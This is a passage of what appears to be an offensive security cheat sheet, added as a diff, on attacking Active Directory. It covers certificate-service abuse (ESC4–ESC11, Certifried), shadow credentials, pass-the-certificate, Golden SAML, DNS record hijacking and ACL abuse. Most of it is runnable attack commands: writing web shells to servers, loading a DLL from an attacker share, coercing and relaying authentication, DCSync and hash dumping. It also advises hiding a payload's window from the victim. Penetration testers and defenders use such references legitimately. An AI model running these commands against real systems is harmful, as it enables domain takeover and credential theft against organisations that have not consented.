+certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local' +# restore the old configuration +certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json +``` + +### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 + +> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name. + +**Exploitation** + +* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag. + ```ps1 + Certify.exe cas + ``` +* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names + ```ps1 + .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin + ``` + +**Mitigation** + +* Remove the flag: `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2` + + +### ESC7 - Vulnerable Certificate Authority Access Control + +**Exploitation** + +* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions + ```ps1 + Certify.exe find /vulnerable + ``` +* Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6) + ```ps1 + Certify.exe setconfig /enablesan /restart + ``` +* Request the certificate with the desired SAN. + ```ps1 + Certify.exe request /template:User /altname:super.adm + ``` +* Grant approval if required or disable the approval requirement + ```ps1 + # Grant + Certify.exe issue /id:[REQUEST ID] + # Disable + Certify.exe setconfig /removeapproval /restart + ``` + +Alternative exploitation from **ManageCA** to **RCE** on ADCS server: + +```ps1 +# Get the current CDP list. 
Useful to find remote writable shares: +Certify.exe writefile /ca:SERVER\ca-name /readonly + +# Write an aspx shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:C:\Windows\SystemData\CES\CA-Name\shell.aspx /input:C:\Local\Path\shell.aspx + +# Write the default asp shell to a local web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp + +# Write a php shell to a remote web directory: +Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php +``` + + +### ESC8 - AD CS Relay Attack + +> An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket. + +Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101) + +* **Version 1**: NTLM Relay + Rubeus + PetitPotam + ```powershell + impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate + # For a member server or workstation, the template would be "Computer". 
+ # Other templates: workstation, DomainController, Machine, KerberosAuthentication + + # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam + # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN + git clone https://github.com/topotam/PetitPotam + python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP + python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP + python3 dementor.py -u -p -d + python3 dementor.py 10.10.10.250 10.10.10.10 -u user1 -p Password1 -d lab.local + + # Use the certificate with rubeus to request a TGT + Rubeus.exe asktgt /user: /certificate: /ptt + Rubeus.exe asktgt /user:dc1$ /certificate:MIIRdQIBAzC...mUUXS /ptt + + # Now you can use the TGT to perform a DCSync + mimikatz> lsadump::dcsync /user:krbtgt + ``` + +* **Version 2**: NTLM Relay + Mimikatz + Kekeo + ```powershell + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController + + # Mimikatz + mimikatz> misc::efs /server:dc.lab.local /connect: /noauth + + # Kekeo + kekeo> base64 /input:on + kekeo> tgt::ask /pfx: /user:dc$ /domain:lab.local /ptt + + # Mimikatz + mimikatz> lsadump::dcsync /user:krbtgt + ``` + +* **Version 3**: Kerberos Relay + ```ps1 + # Setup the relay + sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine + + # Run mitm6 + sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v + ``` + +* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed. 
+ ```powershell + https://github.com/bats3c/ADCSPwn + adcspwn.exe --adcs --port [local port] --remote [computer] + adcspwn.exe --adcs cs.pwnlab.local + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --port 9001 + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --output C:\Temp\cert_b64.txt + adcspwn.exe --adcs cs.pwnlab.local --remote dc.pwnlab.local --username pwnlab.local\mranderson --password The0nly0ne! --dc dc.pwnlab.local + + # ADCSPwn arguments + adcs - This is the address of the AD CS server which authentication will be relayed to. + secure - Use HTTPS with the certificate service. + port - The port ADCSPwn will listen on. + remote - Remote machine to trigger authentication from. + username - Username for non-domain context. + password - Password for non-domain context. + dc - Domain controller to query for Certificate Templates (LDAP). + unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) . + output - Output path to store base64 generated crt. + ``` + +* **Version 5**: Certipy ESC8 + ```ps1 + certipy relay -ca 172.16.19.100 + ``` + + +### ESC9 - No Security Extension + +**Requirements** + +* `StrongCertificateBindingEnforcement` set to `1` (default) or `0` +* Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value +* Certificate specifies `Any Client` authentication EKU +* `GenericWrite` over any account A to compromise any account B + +**Scenario** + +John@corp.local has **GenericWrite** over Jane@corp.local, and we want to compromise Administrator@corp.local. +Jane@corp.local is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value. + +* Obtain the hash of Jane with Shadow Credentials (using our GenericWrite) + ```ps1 + certipy shadow auto -username John@corp.local -p Passw0rd -account Jane + ``` +* Change the **userPrincipalName** of Jane to be Administrator. 
:warning: leave the `@corp.local` part + ```ps1 + certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator + ``` +* Request the vulnerable certificate template ESC9 from Jane's account. + ```ps1 + certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9 + # userPrincipalName in the certificate is Administrator + # the issued certificate contains no "object SID" + ``` +* Restore userPrincipalName of Jane to Jane@corp.local. + ```ps1 + certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local + ``` +* Authenticate with the certificate and receive the NT hash of the Administrator@corp.local user. + ```ps1 + certipy auth -pfx administrator.pfx -domain corp.local + # Add -domain to your command line since there is no domain specified in the certificate. + ``` + +### ESC11 - Relaying NTLM to ICPR + +> Encryption is not enforced for ICPR requests and Request Disposition is set to Issue + +Requirements: +* [sploutchy/Certipy](https://github.com/sploutchy/Certipy) - Certipy fork +* [sploutchy/impacket](https://github.com/sploutchy/impacket) - Impacket fork + +Exploitation: +1. Look for `Enforce Encryption for Requests: Disabled` in `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout` output +2. Setup a relay using Impacket ntlmrelay and trigger a connection to it. + ```ps1 + ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support + ``` + +### Certifried CVE-2022-26923 + +> An authenticated user could manipulate attributes on computer accounts they own or manage, and acquire a certificate from Active Directory Certificate Services that would allow elevation of privilege. 
+ +* Find `ms-DS-MachineAccountQuota` + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'DC=lab,DC=local' ms-DS-MachineAccountQuota + ``` +* Add a new computer in the Active Directory, by default `MachineAccountQuota = 10` + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 addComputer cve 'CVEPassword1234*' + certipy account create 'lab.local/username:Password123*@dc.lab.local' -user 'cve' -dns 'dc.lab.local' + ``` +* [ALTERNATIVE] If you are `SYSTEM` and the `MachineAccountQuota=0`: Use a ticket for the current machine and reset its SPN + ```ps1 + Rubeus.exe tgtdeleg + export KRB5CCNAME=/tmp/ws02.ccache + python bloodyAD -d lab.local -u 'ws02$' -k --host dc.lab.local setAttribute 'CN=ws02,CN=Computers,DC=lab,DC=local' servicePrincipalName '[]' + ``` +* Set the `dNSHostName` attribute to match the Domain Controller hostname + ```ps1 + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 setAttribute 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName '["DC.lab.local"]' + python bloodyAD.py -d lab.local -u username -p 'Password123*' --host 10.10.10.10 getObjectAttributes 'CN=cve,CN=Computers,DC=lab,DC=local' dNSHostName + ``` +* Request a ticket + ```ps1 + # certipy req 'domain.local/cve$:CVEPassword1234*@ADCS_IP' -template Machine -dc-ip DC_IP -ca discovered-CA + certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA + ``` +* Either use the pfx or set a RBCD on your machine account to takeover the domain + ```ps1 + certipy auth -pfx ./dc.pfx -dc-ip 10.10.10.10 + + openssl pkcs12 -in dc.pfx -out dc.pem -nodes + python bloodyAD.py -d lab.local -c ":dc.pem" -u 'cve$' --host 10.10.10.10 setRbcd 'CVE$' 'CRASHDC$' + getST.py -spn LDAP/CRASHDC.lab.local -impersonate Administrator -dc-ip 10.10.10.10 'lab.local/cve$:CVEPassword1234*' + secretsdump.py -user-status -just-dc-ntlm -just-dc-user 
krbtgt 'lab.local/Administrator@dc.lab.local' -k -no-pass -dc-ip 10.10.10.10 -target-ip 10.10.10.10 + ``` + + +### Pass-The-Certificate + +> Pass the Certificate in order to get a TGT, this technique is used in "UnPAC the Hash" and "Shadow Credential" + +* Windows + ```ps1 + # Information about a cert file + certutil -v -dump admin.pfx + + # From a Base64 PFX + Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show + + # Grant DCSync rights to an user + ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --sid + # To restore + ./PassTheCert.exe --server dc.domain.local --cert-path C:\cert.pfx --elevate --target "DC=domain,DC=local" --restore restoration_file.txt + ``` +* Linux + ```ps1 + # Base64-encoded PFX certificate (string) (password can be set) + gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + ​ + # PEM certificate (file) + PEM private key (file) + gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # PFX certificate (file) + password (string, optionnal) + gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # Using Certipy + certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain' + certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx" + ``` + + +## UnPAC The Hash + +Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate. + +* Windows + ```ps1 + # Request a ticket using a certificate and use /getcredentials to retrieve the NT hash in the PAC. 
+ Rubeus.exe asktgt /getcredentials /user:"TARGET_SAMNAME" /certificate:"BASE64_CERTIFICATE" /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show + ``` +* Linux + ```ps1 + # Obtain a TGT by validating a PKINIT pre-authentication + $ gettgtpkinit.py -cert-pfx "PATH_TO_CERTIFICATE" -pfx-pass "CERTIFICATE_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE" + + # Use the session key to recover the NT hash + $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME' + ``` + + +## Shadow Credentials + +> Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user. When trying to pre-authenticate with PKINIT, the KDC will check that the authenticating user has knowledge of the matching private key, and a TGT will be sent if there is a match. + +:warning: User objects can't edit their own `msDS-KeyCredentialLink` attribute while computer objects can. Computer objects can edit their own msDS-KeyCredentialLink attribute but can only add a KeyCredential if none already exists + +**Requirements**: +* Domain Controller on (at least) Windows Server 2016 +* Domain must have Active Directory `Certificate Services` and `Certificate Authority` configured +* PKINIT Kerberos authentication +* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object + +**Exploitation**: +- From Windows, use [Whisker](https://github.com/eladshamir/Whisker): + ```powershell + # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. + Whisker.exe list /target:computername$ + # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. 
+ Whisker.exe add /target:"TARGET_SAMNAME" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /path:"cert.pfx" /password:"pfx-password" + Whisker.exe add /target:computername$ [/domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1] + # Removes a key credential from the target object specified by a DeviceID GUID. + Whisker.exe remove /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /remove:2de4643a-2e0b-438f-a99d-5cb058b3254b + ``` + +- From Linux, use [pyWhisker](https://github.com/ShutdownRepo/pyWhisker): + ```bash + # Lists all the entries of the msDS-KeyCredentialLink attribute of the target object. + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list" + # Generates a public-private key pair and adds a new key credential to the target object as if the user enrolled to WHfB from a new device. + pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" + python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add" --filename "test1" + # Removes a key credential from the target object specified by a DeviceID GUID. 
+ python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "remove" --device-id "a8ce856e-9b58-61f9-8fd3-b079689eb46e" + ``` + +**Scenario**: + +- **Scenario 1**: Shadow Credential relaying + - Trigger an NTLM authentication from `DC01` (PetitPotam) + - Relay it to `DC02` (ntlmrelayx) + - Edit `DC01`'s attribute to create a Kerberos PKINIT pre-authentication backdoor (pywhisker) + - Alternatively : `ntlmrelayx -t ldap://dc02 --shadow-credentials --shadow-target 'dc01$'` + +- **Scenario 2**: Workstation Takeover with RBCD + ```ps1 + # Only for C2: Add Reverse Port Forward from 8081 to Team Server 81 + + # Set up ntlmrelayx to relay authentication from target workstation to DC + proxychains python3 ntlmrelayx.py -t ldaps://dc1.ez.lab --shadow-credentials --shadow-target ws2\$ --http-port 81 + + # Execute printer bug to trigger authentication from target workstation + proxychains python3 printerbug.py ez.lab/matt:Password1\!@ws2.ez.lab ws1@8081/file + + # Get a TGT using the newly acquired certificate via PKINIT + proxychains python3 gettgtpkinit.py ez.lab/ws2\$ ws2.ccache -cert-pfx /opt/impacket/examples/T12uyM5x.pfx -pfx-pass 5j6fNfnsU7BkTWQOJhpR + + # Get a ST (service ticket) for the target account + proxychains python3 gets4uticket.py kerberos+ccache://ez.lab\\ws2\$:ws2.ccache@dc1.ez.lab cifs/ws2.ez.lab@ez.lab administrator@ez.lab administrator_tgs.ccache -v + + # Utilize the ST for future activity + export KRB5CCNAME=/opt/pkinittools/administrator_ws2.ccache + proxychains python3 wmiexec.py -k -no-pass ez.lab/administrator@ws2.ez.lab + ``` + +## Active Directory Groups + +### Dangerous Built-in Groups Usage + +If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object. 
+ +> The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s). + +Find users with `AdminCount=1`. + +```powershell +crackmapexec ldap 10.10.10.10 -u username -p password --admin-count +# or +python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.10.10.10 +jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json +# or +Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)" +Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)" +# or +([adsisearcher]"(AdminCount=1)").findall() +``` + + +### AdminSDHolder Abuse + +> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins. + +If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour). +E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group. + +```powershell +# Add a user to the AdminSDHolder group: +Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -Verbose + +# Right to reset password for toto using the account titi +Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword + +# Give all rights +Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All +``` + + +### Abusing DNS Admins Group + +> It is possible for the members of the DNSAdmins group to load arbitrary DLL with the privileges of dns.exe (SYSTEM). + +:warning: Require privileges to restart the DNS service. 
+ +* Enumerate members of DNSAdmins group + ```ps1 + Get-NetGroupMember -GroupName "DNSAdmins" + Get-ADGroupMember -Identity DNSAdmins + ``` +* Change dll loaded by the DNS service + ```ps1 + # with RSAT + dnscmd /config /serverlevelplugindll \\attacker_IP\dll\mimilib.dll + dnscmd 10.10.10.11 /config /serverlevelplugindll \\10.10.10.10\exploit\privesc.dll + + # with DNSServer module + $dnsettings = Get-DnsServerSetting -ComputerName -Verbose -All + $dnsettings.ServerLevelPluginDll = "\attacker_IP\dll\mimilib.dll" + Set-DnsServerSetting -InputObject $dnsettings -ComputerName -Verbose + ``` +* Check the previous command success + ```ps1 + Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll + ``` +* Restart DNS + ```ps1 + sc \\dc01 stop dns + sc \\dc01 start dns + ``` + +### Abusing Schema Admins Group + +> The Schema Admins group is a security group in Microsoft Active Directory that provides its members with the ability to make changes to the schema of an Active Directory forest. The schema defines the structure of the Active Directory database, including the attributes and object classes that are used to store information about users, groups, computers, and other objects in the directory. + + +### Abusing Backup Operators Group + +> Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group cannot be renamed, deleted, or moved. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers. 
+ +This groups grants the following privileges : +- SeBackup privileges +- SeRestore privileges + +* Get members of the group: + ```ps1 + PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse + ``` +* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege) + ```ps1 + Import-Module .\SeBackupPrivilegeUtils.dll + Import-Module .\SeBackupPrivilegeCmdLets.dll + + Set-SeBackupPrivilege + Get-SeBackupPrivilege + ``` +* Retrieve sensitive files + ```ps1 + Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite + ``` +* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive + ```ps1 + $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64) + $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon') + $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"} + ``` +* Retrieve SAM,SECURITY and SYSTEM hives + * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\` + * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK` + + +## Active Directory Federation Services + +### ADFS - Golden SAML + +**Requirements**: +* ADFS service account +* The private key (PFX with the decryption password) + +**Exploitation**: +* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. 
It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` +* Convert PFX and Private Key to binary format + ```ps1 + # For the pfx + echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin + # For the private key + echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin + ``` +* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). + ```ps1 + mkdir ADFSpoofTools + cd $_ + git clone https://github.com/dmb2168/cryptography.git + git clone https://github.com/mandiant/ADFSpoof.git + virtualenv3 venvADFSSpoof + source venvADFSSpoof/bin/activate + pip install lxml + pip install signxml + pip uninstall -y cryptography + cd cryptography + pip install -e . + cd ../ADFSpoof + pip install -r requirements.txt + python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls + /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' + ``` + +Other interesting tools to exploit AD FS: +* [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) + + +## Active Directory Integrated DNS + +ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic. Active Directory will need some time (~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol. 
+ +* Enumerate all records using [dirkjanm/adidnsdump](https://github.com/dirkjanm/adidnsdump) + ```ps1 + adidnsdump -u DOMAIN\\user --print-zones dc.domain.corp (--dns-tcp) + ``` +* Query a node using [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx) + ```ps1 + dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query $DomainController (--legacy) + ``` +* Add a node and attach a record + ```ps1 + dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController + ``` + +The common way to abuse ADIDNS is to set a wildcard record and then passively listen to the network. + +```ps1 +Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y +``` + + +## Abusing Active Directory ACLs/ACEs + +Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). + +```powershell +ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtree -EffectiveRightsPrincipal User1 -Output HTML -Show +``` + +### GenericAll + +* **GenericAll on User** : We can reset user's password without knowing the current password +* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user hacker) to the Domain Admin group : + * On Windows : `net group "domain admins" hacker /add /domain` + * On Linux: + * using the Samba software suite : + `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'hacker%MyPassword123' -W DOMAIN -I [DC IP]` + * using bloodyAD: + `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'` + +* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a Service Ticket (ST), then grab its hash and kerberoast it. 
+ ```powershell + # Check for interesting permissions on accounts: + Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"} + + # Check if current user has already an SPN setted: + PowerView2 > Get-DomainUser -Identity | select serviceprincipalname + + # Force set the SPN on the account: Targeted Kerberoasting + PowerView2 > Set-DomainObject -Set @{serviceprincipalname='ops/whatever1'} + PowerView3 > Set-DomainObject -Identity -Set @{serviceprincipalname='any/thing'} + + # Grab the ticket + PowerView2 > $User = Get-DomainUser username + PowerView2 > $User | Get-DomainSPNTicket | fl + PowerView2 > $User | Select serviceprincipalname + + # Remove the SPN + PowerView2 > Set-DomainObject -Identity username -Clear serviceprincipalname + ``` + +* **GenericAll/GenericWrite** : We can change a victim's **userAccountControl** to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back. + * On Windows: + ```powershell + # Modify the userAccountControl + PowerView2 > Get-DomainUser username | ConvertFrom-UACValue + PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose + + # Grab the ticket + PowerView2 > Get-DomainUser username | ConvertFrom-UACValue + ASREPRoast > Get-ASREPHash -Domain domain.local -UserName username + + # Set back the userAccountControl + PowerView2 > Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose + PowerView2 > Get-DomainUser username | ConvertFrom-UACValue + ``` + * On Linux: + ```bash + # Modify the userAccountControl + $ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 True + + # Grab the ticket + $ GetNPUsers.py DOMAIN/target_user -format -outputfile + + # Set back the userAccountControl + $ bloodyAD.py --host [DC IP] -d [DOMAIN] -u [AttackerUser] -p [MyPassword] setUserAccountControl [Target_User] 0x400000 False + ``` + + +### GenericWrite 
+ +* Reset another user's password + * On Windows: + ```powershell + # https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1 + $user = 'DOMAIN\user1'; + $pass= ConvertTo-SecureString 'user1pwd' -AsPlainText -Force; + $creds = New-Object System.Management.Automation.PSCredential $user, $pass; + $newpass = ConvertTo-SecureString 'newsecretpass' -AsPlainText -Force; + Set-DomainUserPassword -Identity 'DOMAIN\user2' -AccountPassword $newpass -Credential $creds; + ``` + * On Linux: + ```bash + # Using rpcclient from the Samba software suite + rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" + + # Using bloodyAD with pass-the-hash + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd + ``` + +* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\10.0.0.5\totallyLegitScript.ps1` + +#### GenericWrite and Remote Connection Manager + +> Now let’s say you are in an Active Directory environment that still actively uses a Windows Server version that has RCM enabled, or that you are able to enable RCM on a compromised RDSH, what can we actually do ? Well each user object in Active Directory has a tab called ‘Environment’. +> +> This tab includes settings that, among other things, can be used to change what program is started when a user connects over the Remote Desktop Protocol (RDP) to a TS/RDSH in place of the normal graphical environment. 
The settings in the ‘Starting program’ field basically function like a windows shortcut, allowing you to supply either a local or remote (UNC) path to an executable which is to be started upon connecting to the remote host. During the logon process these values will be queried by the RCM process and run whatever executable is defined. - https://sensepost.com/blog/2020/ace-to-rce/ + +:warning: The RCM is only active on Terminal Servers/Remote Desktop Session Hosts. The RCM has also been disabled on recent version of Windows (>2016), it requires a registry change to re-enable. + +```powershell +$UserObject = ([ADSI]("LDAP://CN=User,OU=Users,DC=ad,DC=domain,DC=tld")) +$UserObject.TerminalServicesInitialProgram = "\\1.2.3.4\share\file.exe" +$UserObject.TerminalServicesWorkDirectory = "C:\" +$UserObject.SetInfo() +``` + +NOTE: To not alert the user the payload should hide its own process window and spawn the normal graphical environment. + +### WriteDACL + +To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. 
[Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'` + +* WriteDACL on Domain: + * On Windows: + ```powershell + # Give DCSync right to the principal identity + Import-Module .\PowerView.ps1 + $SecPassword = ConvertTo-SecureString 'user1pwd' -AsPlainText -Force + $Cred = New-Object System.Management.Automation.PSCredential('DOMAIN.LOCAL\user1', $SecPassword) + Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=local' -Rights DCSync -PrincipalIdentity user2 -Verbose -Domain domain.local + ``` + * On Linux: + ```bash + # Give DCSync right to the principal identity + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 + + # Remove right after DCSync + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B setDCSync user2 False + ``` + +* WriteDACL on Group + ```powershell + Add-DomainObjectAcl 